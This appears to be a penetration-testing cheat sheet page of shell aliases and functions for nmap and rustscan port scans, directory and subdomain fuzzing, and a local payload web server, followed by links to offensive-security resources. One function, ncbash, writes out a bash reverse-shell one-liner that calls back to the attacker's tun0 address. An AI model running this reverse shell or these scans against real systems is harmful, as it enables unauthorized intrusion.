Cheat Sheet

Cheat Sheet

File Transfer

Windows Passwords

Active Directory

Pivoting & Tunneling

##

Aliases

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
alias www='sudo python3 -m http.server 80'
alias hosts='sudo vim /etc/hosts'
alias tun0cp="ifconfig tun0 | grep 'inet ' | cut -d' ' -f10 | tr -d '\n' | xclip -sel clip"
alias tun0="ifconfig tun0 | grep 'inet ' | cut -d' ' -f10 | tr -d '\n'"

nmapcv() {
    [ ! -d "./scans" ] && mkdir scans
    sudo nmap -sCV -T4 "${@}" | tee scans/nmap
}

nmapall() {
    [ ! -d "./scans" ] && mkdir scans
    sudo nmap --min-rate 1000 -p- -T4 "${@}" | tee scans/nmapall
}

rustall() {
    rustscan -r 0-65535 --ulimit 5000 $1 -t 9000 -- -sV -sC
}

ferobig () { 
    url="$1"; shift; feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$url "$@" | tee scans/ferobig.txt
}

ferodir () { 
    url="$1"; shift; feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$url "$@" | tee scans/ferodir.txt
}

ferocom () {
    url="$1"; shift; feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://$url "$@" | tee scans/ferocom.txt
}

ffufnames () {
    url="$1"; shift; ffuf -c -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://$url -H "Host: FUZZ.$url" "$@"
}

wfuzznames () {
    url="$1"; shift; wfuzz -c -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://$url -H "Host: FUZZ.$url" "$@"
}

ncbash () {
    echo "bash -i >& /dev/tcp/$(tun0)/9001 0>&1" | nc -lvnp 1234
}

Resources

0xdf

HackTricks

Ippsec.rocks

PayloadAllTheThings

RevShells